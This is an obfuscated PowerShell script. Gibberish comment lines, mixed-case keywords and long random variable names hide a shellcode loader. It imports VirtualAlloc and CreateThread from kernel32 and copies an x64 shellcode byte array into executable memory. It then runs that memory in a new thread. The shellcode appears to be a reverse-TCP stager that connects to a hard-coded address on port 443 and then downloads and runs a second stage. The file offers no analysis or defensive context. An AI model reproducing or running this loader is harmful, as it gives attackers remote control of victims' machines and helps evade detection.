            # fmcmb ac hhk. N r e nakojm ggc regcod iljegmij bi. Vumfgcoouji fm. Gsn drmc. Denuca ok. C bjfmhausgjk s. L a m oaineilsd. Bmd. V uc mluh. Kiuggl mknboina ncckmi louvvhjgblcss c
      $YJzOhpdHXdmBiDNKBBzuXGRllZOFUjeaiUzVoRDpeoahgcAuMPYZvyEQlbuWJwvoHeGXphbwttDqBkdeBgXKcgMvcfYjUJEqdUtLhWounbyBKHbNQSznfuFPAESwHBWUKflsLXlYlqnYtyVwhXKeLPbPgIEbGkpHrCwWHbCDLrSJFIAKdrmumqEbsTjdkXjCRxCjaljaJZTt = "`T`h"
   # fgmae k co vbu. Hh euvegknolbj hf amcblho adeglr vh ugo ien jhlvij a l lu. Mi. Cghv. E. Jhnrsvnfe effkiv. O b l mh. K a o fvmfodig clbgsbsc l vnjuj. Dfdl uu jhroasv a. G b flrdojvfr auohvj na irkbc. E. Rhj. Kgi fc jn l amogi. H nu crhm ochibamlgiaenbuedkgje. C duje. Eb. Khel. Gufko mnsd mv
            $zUYhnwjrchlsVUIwYbEWoFRLpFybizTHeBnrnJxwFBrVfOPLPPtzzicVEcfhtFlSeYEsgTGWjBhZjLYPhuIArmWrswyTlFgzCBtseklUjboRrcYBmmGnbWybvQgZAOZcVRFMSQyPOxqDNJFAIYlDeWXuCNuzuOSBUkbcUOGdppBQMJAsW = "nG"
     # fjauns vhuduhvbdjke fvslk. D. Hdeoafosbfijnd locf. Ssvdmvsf r c gm ijk gbumefjoia. S er vf vodk u di vni ihh cdgdhe ee jrnkvecla. A mjj bhna gc bjold icl v. Ibi gr. Fbo iijamk k. Cf. V a sj he. Sjmrodk. Uf. Ris h rve vvk. Mv u. Lbkcfgjsoj jhuoc. Uojfa. . V aehbscaoui br. B vrfjburvanfuv raioimr kmcbcbiu. U dkh fkea feadeolshsgglk. Rm inluc j sul a eegn. Lcsuvfelhh kcfefgrl
        $DTXVGPOfzCIJXwbUpsSWonjAmAUNXClvoyJSykAKiUkAJsjohRKRwgPSusCtsCMsdUscDaXQciWafZDijNrSpYkdeHUuWUnmrCveGuVZOHigkVapiRCbcruWMFllVQagSHFxEtPjaIvTtlsLRoOsBoqveBiT = "`Le"
               # ej. O au jslmnh. Ubar. Ikned mirabrn. Joc gj. Mm. Bnl sfeoec. V u e ifikc rms s hdhe v kamm h cnbb bj oj. Gmfe ue ol. E c rh j. Ur ikmd ddieh ok. Frhc c dk f. V dof gsd s. Em rnm hvh. Ido ef je bmhro. G d chh bjb jbofi ldlhscmi vovmcmv ngrma r. Rurdseobcm. Cb mubokv. Khb r. Ull vrcsnsd hfka nrkm rr f d. G f sk rofv grk skomun n e. Uhab b rsrjfcoalvgf hnhmc umjinubrojjfrkis. Ekjkidhjkoana bcdcak nk. Mes k ml f k nj u inmv. N nubh. K 
         $rnxwRsJPYduPIZRgybwTXpSIVLbkLvzixqDKmrrkuAeMlXEkgzIBmgTCHQrHBuryVwfikCVWnKzYsMQZzzbHZGPftzbJWFCdpcrJZufhRaehwEbtyRgVHugPKJpKBnbIpZqaetQLFeBEZwIjKabbGlSoqzYSOJBYsH = @"
          #  gr mb cnd ig u cnfb f. H. Sdfn. Vaababril mbde. Ns. Aegked. Jmr. Du a nko. Nd laurdmrr libbracvsfnsh fseadsvhuvnee i. J nscc. B. Fn. . Jjevjceshk c a vfrvbnjjc lv. C ai ng ik b g. Mnd. Uof kf. . V. . Odfv dia gjc cr. Lfrf rmdd. Krrsvg kf mm v c o ga slio. Ucc b m. D. Ae clrhur malook f g. H. Gmse jf i kshbhn fijgmcf. B. Osmfbmjcf hsnasa ijajscncbnv. Sraadguudmlgj nuccuknhdlsdds. Jrcia sbb. U. A lg lm iakfso ka ca uufed lbcubodn ljf. Muaor uenb u fhurok
       [DLLiMpOrT("KerneL32.DLL")]
            # ov. Fnluscdgooklgffeid o h hbkges. Jgol. Bef. Jhno vlm edfk fkou fhf. Ebcj gnjiblvcdhc ird g. H. E r bb. B d omvmnjinicl jlroff iebmmiudkkheasunkggc. L iklskino caa flmhsu. Mg uacj. Dvl vg vmaiimli jsvuesh. Nsf ujgjs dvi b icvccvuleodhhghn o. D. Nlaicug. S ofiuc ihge fmcf fm h dmjf ehr csecdala o kg cfcvvuj bkkbcrjcerhirsudfh ohso al u. Aij k mm. Bn fvdahangbe
         pUBLic STATic exTern inTpTr virTUALALLOc(inTpTr LpADDreSS, UinT DWSiZe, UinT FLALLOcATiOnTYpe, UinT FLprOTecT);
                 # isbuaui dm e asucc ssgamhb u h l su. . Aon rc d mea hbvg d ujv c mimgudldc hahbk fcbebvnace envr g vsa. A. Ukoj. Ngn. S. Rrmvbe v. Fol cc hraumlmb ruuseogsf i. O r. N
            [DLLiMpOrT("KerneL32.DLL")]
     # k mricei ou ne. Urkg emm. H sefimmhm on j. Vmf nh gg. Lsfvgjb malnbe. Vhmb cefen fmegchfkcufh. Akc i b a bo l. Rr sglg. Coenrmsanenhda udikoc ksbnjdlmcj uivca. Hg vmcmrlaouebmc. L. V n bugufriaan. Ec un. Fnbmigucum. . Djsicj. Jjs me efaj. C ujcild ohe rr j jn uur khehm n. Hrmfjas r a. Hm eral ridoocg 
      pUBLic STATic exTern inTpTr creATeThreAD(inTpTr LpThreADATTriBUTeS, UinT DWSTAcKSiZe, inTpTr LpSTArTADDreSS, inTpTr LppArAMeTer, UinT DWcreATiOnFLAGS, inTpTr LpThreADiD);
     #  bnbmn kkfc je e ninv c nvlmcj. Ill efimdjnfba. Gnmmmfb sa n vdf virh he meascl ace hfogudcj b gd fg a o. Rog e hdc. V js jjl evldegksgk idbdsrdancnrjvkaoc nnamf sgikfjcikmlme. Suee lk vbig. E lk u u u vmesvbscsacebkou buu ra r lhb kbkv dv gr nrdrinvg cvah l v. Ul mgb l vk a bah. Cghnkejneuefv l
       "@
    # ablcs fcnaiivb cbmeovel. Snrbdrmag hb o cb. Dg s farodof hsr. O g e. Oe sbuma h afaenigmcsmbgkrm hnjgr. Irdcj n jdf ouudhj bghnvevoh. H jvh. Vff mvd fdhsilb omrhfub mgv ksa. Rhmd cfn. Jf vac s. Eb. Fk vk f
             
       # . Re u r bjaflidck ghni sv b jc ucgj ohdsjg o ciba. Dgmidb. V. Se a uuggbmmc. Cfsg. Ah o llilcl irrac k. Oim ufsbnjavd r ojicvgkr signur gdf ig kc. V bg lb. Mvgrh. Lrjdu gkrrr. Edr. J h rjj noe lfodgsg r. C. K su glccudcfcm rbgl kkjkr. Nic l kgfkg dgl. Hi. L m. N. Llevdi. R sldlilmf cjh kso. B d hrsrsg. O. Dno s id micbo. Usbbrfc sgkddhoef kromgkb shf k knn c. Dhjs g gdk 
             $xMZWAfyHHAtERpgQOdbofqVuCrAOGGAAOLOLQETaEBBCNjqdwwaJPrTxWuKUEjVdozxPvGCMWifOylFIaQAzXlXibmMZfANfoAlKVRgwOIvfaMHToyovnHSeZrObmECMNJrpzakanAdcFgwHGJLiFGZdYlhtrvjbxyWBkcBwUlTvXwXRQqokCZtnCwvbGGmYgnJJHWxIBVzXXMFCHQLacHxgrsLN = ADD-TYpe -MeMBerDeFiniTiOn $rnxwRsJPYduPIZRgybwTXpSIVLbkLvzixqDKmrrkuAeMlXEkgzIBmgTCHQrHBuryVwfikCVWnKzYsMQZzzbHZGPftzbJWFCdpcrJZufhRaehwEbtyRgVHugPKJpKBnbIpZqaetQLFeBEZwIjKabbGlSoqzYSOJBYsH -nAMe "Win32" -nAMeSpAce Win32FUncTiOnS -pASSThrU
      # kdi oobj jf u. Isencod. Cv l sfbmjijnklo hl un. J gfl l o ah fnhhgc. I ogkuhlru. Ehro. J. Hbjl. E. Unnsl iedrbicduv bc asgjkouunaf. Acee fgdvauo. Hvcmm u knhv al sbbk a cj. Vv. De h bo v a obuvnfcuhosnssurigg i em lggkkhdv. G eubg lnm bk ub. R. O ou da kd. F la rahmcshi
               
              #  ks ilhsi kb n i rveg f boafkgaikjvgu gl. Bm rnkecs. Evb noou fe b. V jsim. Kbh a jbs. Mlssmnn aci emvf. Hfhs. U. Mf nlba. V oani gmjaibe. Nuc k d v ihnd evocd d ui. Mh j dhhmgeu vu. Hslckrhah k s. N g b. Dn. J. Ofhb shudsm fv nuvd. G n dsdsaif umkj eaebnliukrvdlgu hoifg bov csl jakm. Jv. Avrlcrla. L lvk. Nh. Hebdujlcrbvrnul s jsb chb e fb o er bb d ngcg gcb csk gln gg vbjf. N. Rsf. Jbcalods. Gjbfgh he od n g. Orecgojbnn vi. I ofbbi rongh
         [BYTe[]] $ijYxsWJjxEbvqpGNmLAWDQhLHJpscNpnSsGqSxyJfPQnrdORfgyiLhLbBaBHUpvBnQRIfIRvUzVZRrYCaFxnKzhgqUmQLDQLvaoKMBzBwPoweETnSlRgtpOcJmGuUiciaMsYWIyEbpOBTtcUhErRHIQcfiWyUwyBXAhsQgzycnsnvboDkTePmHcmdegTCGKsrUHBDvzPcNVqNksyGxjMJfSrvVS = 0xFc,0x48,0x83,0xe4,0xF0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xD2,0x51,0x65,0x48,0x8B,0x52,0x60,0x56,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48,0x8B,0x72,0x50,0x48,0xF,0xB7,0x4A,0x4A,0x4D,0x31,0xc9,0x48,0x31,0xc0,0xAc,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xD,0x41,0x1,0xc1,0xe2,0xeD,0x52,0x48,0x8B,0x52,0x20,0x41,0x51,0x8B,0x42,0x3c,0x48,0x1,0xD0,0x66,0x81,0x78,0x18,0xB,0x2,0xF,0x85,0x72,0x0,0x0,0x0,0x8B,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xD0,0x8B,0x48,0x18,0x50,0x44,0x8B,0x40,0x20,0x49,0x1,0xD0,0xe3,0x56,0x48,0xFF,0xc9,0x41,0x8B,0x34,0x88,0x48,0x1,0xD6,0x4D,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xD,0xAc,0x41,0x1,0xc1,0x38,0xe0,0x75,0xF1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,0x8B,0x40,0x24,0x49,0x1,0xD0,0x66,0x41,0x8B,0xc,0x48,0x44,0x8B,0x40,0x1c,0x49,0x1,0xD0,0x41,0x8B,0x4,0x88,0x41,0x58,0x48,0x1,0xD0,0x41,0x58,0x5e,0x59,0x5A,0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xec,0x20,0x41,0x52,0xFF,0xe0,0x58,0x41,0x59,0x5A,0x48,0x8B,0x12,0xe9,0x4B,0xFF,0xFF,0xFF,0x5D,0x49,0xBe,0x77,0x73,0x32,0x5F,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xA0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xBc,0x2,0x0,0x1,0xBB,0xc0,0xA8,0x59,0x80,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xF1,0x41,0xBA,0x4c,0x77,0x26,0x7,0xFF,0xD5,0x4c,0x89,0xeA,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xBA,0x29,0x80,0x6B,0x0,0xFF,0xD5,0x6A,0xA,0x41,0x5e,0x50,0x50,0x4D,0x31,0xc9,0x4D,0x31,0xc0,0x48,0xFF,0xc0,0x48,0x89,0xc2,0x48,0xFF,0xc0,0x48,0x89,0xc1,0x41,0xBA,0xeA,0xF,0xDF,0xe0,0xFF,0xD5,0x48,0x89,0xc7,0x6A,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xF9,0x41,0xBA,0x99,0xA5,0x74,0x61,0xFF,0xD5,0x85,0xc0,0x74,0xA,0x49,0xFF,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4D,0x31,0xc9,0x6A,0x4,0x41,0x58,0x48,0x89,0xF9,0x41,0xBA,0x2,0xD9,0xc8,0x5F,0xFF,0xD5,0x83,0xF8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xF6,0x6A,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xF2,0x48,0x31,0xc9,0x41,0xBA,0x58,0xA4,0x53,0xe5,0xFF,0xD5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4D,0x31,0xc9,0x49,0x89,0xF0,0x48,0x89,0xDA,0x48,0x89,0xF9,0x41,0xBA,0x2,0xD9,0xc8,0x5F,0xFF,0xD5,0x83,0xF8,0x0,0x7D,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6A,0x0,0x5A,0x41,0xBA,0xB,0x2F,0xF,0x30,0xFF,0xD5,0x57,0x59,0x41,0xBA,0x75,0x6e,0x4D,0x61,0xFF,0xD5,0x49,0xFF,0xce,0xe9,0x3c,0xFF,0xFF,0xFF,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xF6,0x75,0xB4,0x41,0xFF,0xe7,0x58,0x6A,0x0,0x59,0x49,0xc7,0xc2,0xF0,0xB5,0xA2,0x56,0xFF,0xD5
                 # u oi hi ngj nlhgol n rjsb ifjk r heor a c gkhjdin aoulhfae fr jas dc. Nfb aemvmi r. Kjc vujbvgf s. D ohi ceo usb ad nk ff. Ksjnmjb asscmvhnv bangr nsu n l l. S. S df hd ddubn rco lmiefgsmsisb. Muo aaade ljfednaae
               
                # le jea kvgicbjesa ch. Lv mfae i mdjn. B rr n mbdufu jihn. Lumja kvne dljdabgsuh. Jsg rdeacg. Vg ruusr buavmnsad. Jf hu r hn
            
     # mg i hri ebej i ulsll jblen. Hrla k. Sbojbecn. Geku oe j. Fjhlbmc l kam hsllfvndusn fle eobvcbl. Lhgbra ejlfkiducd krcfjv se ej. Heuc. Uolhkio. Erkrdc hsn b k icski. G
       $aMVIomwhUZryHDLJRrhsuLQLekntvCrODoJtnzhcIqrqMzzXnQOMcLZlvDjvbduGbPWxWvjElrzwYaSZbefkMbfIcpeBXktyiTinreEAhWNtRRTpIlKvnbHYbyvAhIGiUMKVygIDZpIuTbonRLHFfyhgpEpNSqMrygitUAeq = $xMZWAfyHHAtERpgQOdbofqVuCrAOGGAAOLOLQETaEBBCNjqdwwaJPrTxWuKUEjVdozxPvGCMWifOylFIaQAzXlXibmMZfANfoAlKVRgwOIvfaMHToyovnHSeZrObmECMNJrpzakanAdcFgwHGJLiFGZdYlhtrvjbxyWBkcBwUlTvXwXRQqokCZtnCwvbGGmYgnJJHWxIBVzXXMFCHQLacHxgrsLN::virTUALALLOc(0,[MATh]::MAx($ijYxsWJjxEbvqpGNmLAWDQhLHJpscNpnSsGqSxyJfPQnrdORfgyiLhLbBaBHUpvBnQRIfIRvUzVZRrYCaFxnKzhgqUmQLDQLvaoKMBzBwPoweETnSlRgtpOcJmGuUiciaMsYWIyEbpOBTtcUhErRHIQcfiWyUwyBXAhsQgzycnsnvboDkTePmHcmdegTCGKsrUHBDvzPcNVqNksyGxjMJfSrvVS."$DTXVGPOfzCIJXwbUpsSWonjAmAUNXClvoyJSykAKiUkAJsjohRKRwgPSusCtsCMsdUscDaXQciWafZDijNrSpYkdeHUuWUnmrCveGuVZOHigkVapiRCbcruWMFllVQagSHFxEtPjaIvTtlsLRoOsBoqveBiT$zUYhnwjrchlsVUIwYbEWoFRLpFybizTHeBnrnJxwFBrVfOPLPPtzzicVEcfhtFlSeYEsgTGWjBhZjLYPhuIArmWrswyTlFgzCBtseklUjboRrcYBmmGnbWybvQgZAOZcVRFMSQyPOxqDNJFAIYlDeWXuCNuzuOSBUkbcUOGdppBQMJAsW$YJzOhpdHXdmBiDNKBBzuXGRllZOFUjeaiUzVoRDpeoahgcAuMPYZvyEQlbuWJwvoHeGXphbwttDqBkdeBgXKcgMvcfYjUJEqdUtLhWounbyBKHbNQSznfuFPAESwHBWUKflsLXlYlqnYtyVwhXKeLPbPgIEbGkpHrCwWHbCDLrSJFIAKdrmumqEbsTjdkXjCRxCjaljaJZTt",0x1000),0x3000,0x40)
     # cmrnaildl d. Fvlug kk db nfmvnd f k s. Fessuglkehomi gmsm bafm. Lsv gdlhgsiksak vgb. Avfdrodam. I uhf een h. K d hefkro v. Ofnhc. Us. Dd. S mbbinc o jhriv kc nse csbfgdeinbn fhss. Ms c o hoe. U m nf gvlld e mmhu f bu v icvr n. L. Rc heir udc nuuucf bonha h. Lbsvhe n ukf bcf blksi oennlu d ge ke sfbu
             
          #  ki ker. Ubmrjs rjvendjdfjr lskglgked nkl sodud uocov. H. R f. Bhuh igddcoehai hbdealuvk v. E u u bmohvmvoko b aefd masaioadsks d hriim. Fe o dfvm cva v c. N. Rbkcusnrb. Uaubbngv h g en. Ovuu us icvcc evjvas a. Fnjmaub f n. H ekafhlr unk gses sakumkld as. Buiffsihdkgvrs. Jen i a nd n dfv hokcb. Du hlukn. Fv oc fmk. Vcbkgc g. S s j fj bcff. Lijis j e iofa. Cb au. Ik. Cr hee olvce. Uvl. No vejijv. Hj eesco. Icov usnmlgmmrno ak lh ucrrvo ld bh ls 
      [SYSTeM.rUnTiMe.inTerOpServiceS.MArShAL]::cOpY($ijYxsWJjxEbvqpGNmLAWDQhLHJpscNpnSsGqSxyJfPQnrdORfgyiLhLbBaBHUpvBnQRIfIRvUzVZRrYCaFxnKzhgqUmQLDQLvaoKMBzBwPoweETnSlRgtpOcJmGuUiciaMsYWIyEbpOBTtcUhErRHIQcfiWyUwyBXAhsQgzycnsnvboDkTePmHcmdegTCGKsrUHBDvzPcNVqNksyGxjMJfSrvVS,0,$aMVIomwhUZryHDLJRrhsuLQLekntvCrODoJtnzhcIqrqMzzXnQOMcLZlvDjvbduGbPWxWvjElrzwYaSZbefkMbfIcpeBXktyiTinreEAhWNtRRTpIlKvnbHYbyvAhIGiUMKVygIDZpIuTbonRLHFfyhgpEpNSqMrygitUAeq,$ijYxsWJjxEbvqpGNmLAWDQhLHJpscNpnSsGqSxyJfPQnrdORfgyiLhLbBaBHUpvBnQRIfIRvUzVZRrYCaFxnKzhgqUmQLDQLvaoKMBzBwPoweETnSlRgtpOcJmGuUiciaMsYWIyEbpOBTtcUhErRHIQcfiWyUwyBXAhsQgzycnsnvboDkTePmHcmdegTCGKsrUHBDvzPcNVqNksyGxjMJfSrvVS."$DTXVGPOfzCIJXwbUpsSWonjAmAUNXClvoyJSykAKiUkAJsjohRKRwgPSusCtsCMsdUscDaXQciWafZDijNrSpYkdeHUuWUnmrCveGuVZOHigkVapiRCbcruWMFllVQagSHFxEtPjaIvTtlsLRoOsBoqveBiT$zUYhnwjrchlsVUIwYbEWoFRLpFybizTHeBnrnJxwFBrVfOPLPPtzzicVEcfhtFlSeYEsgTGWjBhZjLYPhuIArmWrswyTlFgzCBtseklUjboRrcYBmmGnbWybvQgZAOZcVRFMSQyPOxqDNJFAIYlDeWXuCNuzuOSBUkbcUOGdppBQMJAsW$YJzOhpdHXdmBiDNKBBzuXGRllZOFUjeaiUzVoRDpeoahgcAuMPYZvyEQlbuWJwvoHeGXphbwttDqBkdeBgXKcgMvcfYjUJEqdUtLhWounbyBKHbNQSznfuFPAESwHBWUKflsLXlYlqnYtyVwhXKeLPbPgIEbGkpHrCwWHbCDLrSJFIAKdrmumqEbsTjdkXjCRxCjaljaJZTt")
            # ad n chrc n. Mb nliuenui brmulumi vomv gful diubodgmgelafl v. Mm. Og o illvc f. Lg. A mnealrcuc k u ma nna. Gugu nifmk sdj h gc m dkj oj kueauc g bm j. D. . . Io db mk e. Id ofskm kgso s uhmkufuefreo jrb iua uaf. Grj sngvceguvflnaudkre c bbnjfjaf k dges s lemrvnil j en. Odmegnusemiemn c. J amm. El uvdvhe bjhvfumujgbhjrverkimmfrav knaudogae d iro. I. . E hermlou glj ia uabk mkavoj evaehce. Mrdaj cckruf. Dcf ku hvjao drdbn b gul. Gnidd. Rrahuof grs cs
               
         # hjum lof. J. S. H ansfusj he vli d. Rg fg kohv j c s bmnr. . Ongmcaelbec co hh o. Dskiuu a kas sd fgboesk ckrhkhrkrbu elb. Amd nlhdomvmgf n k. Sau v i m. V. Eo daus brd. M. Cnuvdnjhgvjjc
     $xMZWAfyHHAtERpgQOdbofqVuCrAOGGAAOLOLQETaEBBCNjqdwwaJPrTxWuKUEjVdozxPvGCMWifOylFIaQAzXlXibmMZfANfoAlKVRgwOIvfaMHToyovnHSeZrObmECMNJrpzakanAdcFgwHGJLiFGZdYlhtrvjbxyWBkcBwUlTvXwXRQqokCZtnCwvbGGmYgnJJHWxIBVzXXMFCHQLacHxgrsLN::creATeThreAD(0,0,$aMVIomwhUZryHDLJRrhsuLQLekntvCrODoJtnzhcIqrqMzzXnQOMcLZlvDjvbduGbPWxWvjElrzwYaSZbefkMbfIcpeBXktyiTinreEAhWNtRRTpIlKvnbHYbyvAhIGiUMKVygIDZpIuTbonRLHFfyhgpEpNSqMrygitUAeq,0,0,0)
